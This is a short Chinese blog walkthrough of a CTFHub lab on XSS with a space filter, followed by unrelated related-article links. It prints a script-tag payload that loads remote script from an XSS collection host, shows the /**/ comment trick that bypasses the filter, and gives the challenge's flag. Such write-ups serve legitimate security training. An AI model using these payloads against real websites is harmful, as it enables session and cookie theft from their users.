CTFHUB技能树之XSS——过滤空格

南暮思鸢2024-10-24 22:59

开启靶场,打开链接:

看上去是GET传参,有点像反射型的那题

在第一个输入框中输入:

<sCRiPt sRC=//xs.pe/6b6></sCrIpT>

没什么反应,右键查看源代码:

发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理

用/**/绕过:

<sCRiPt/**/sRC=//xs.pe/6b6></sCrIpT>

提交之后再复制地址栏中的URL,粘贴到第二个输入框中提交:

成功得到flag:

ctfhub{5f10e129d697165a8083b5be}

相关推荐
言慢行善5 小时前
sqlserver模糊查询问题
java·数据库·sqlserver
专吃海绵宝宝菠萝屋的派大星5 小时前
使用Dify对接自己开发的mcp
java·服务器·前端
爱分享的阿Q5 小时前
Rust加WebAssembly前端性能革命实践指南
前端·rust·wasm
蓝黑20205 小时前
Vue的 value=“1“ 和 :value=“1“ 有什么区别
前端·javascript·vue
小李子呢02115 小时前
前端八股6---v-model双向绑定
前端·javascript·算法
大数据新鸟5 小时前
操作系统之虚拟内存
java·服务器·网络
Tong Z5 小时前
常见的限流算法和实现原理
java·开发语言
凭君语未可5 小时前
Java 中的实现类是什么
java·开发语言
He少年5 小时前
【基础知识、Skill、Rules和MCP案例介绍】
java·前端·python
史迪仔01125 小时前
[QML] QML IMage图像处理
开发语言·前端·javascript·c++·qt
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程04VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)05AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南06Oh My Codex 快速使用指南07UV安装并设置国内源08基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南09实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了10【STM32】HAL库 CubeMX 教程 --- 通用定时器 TIM2 定时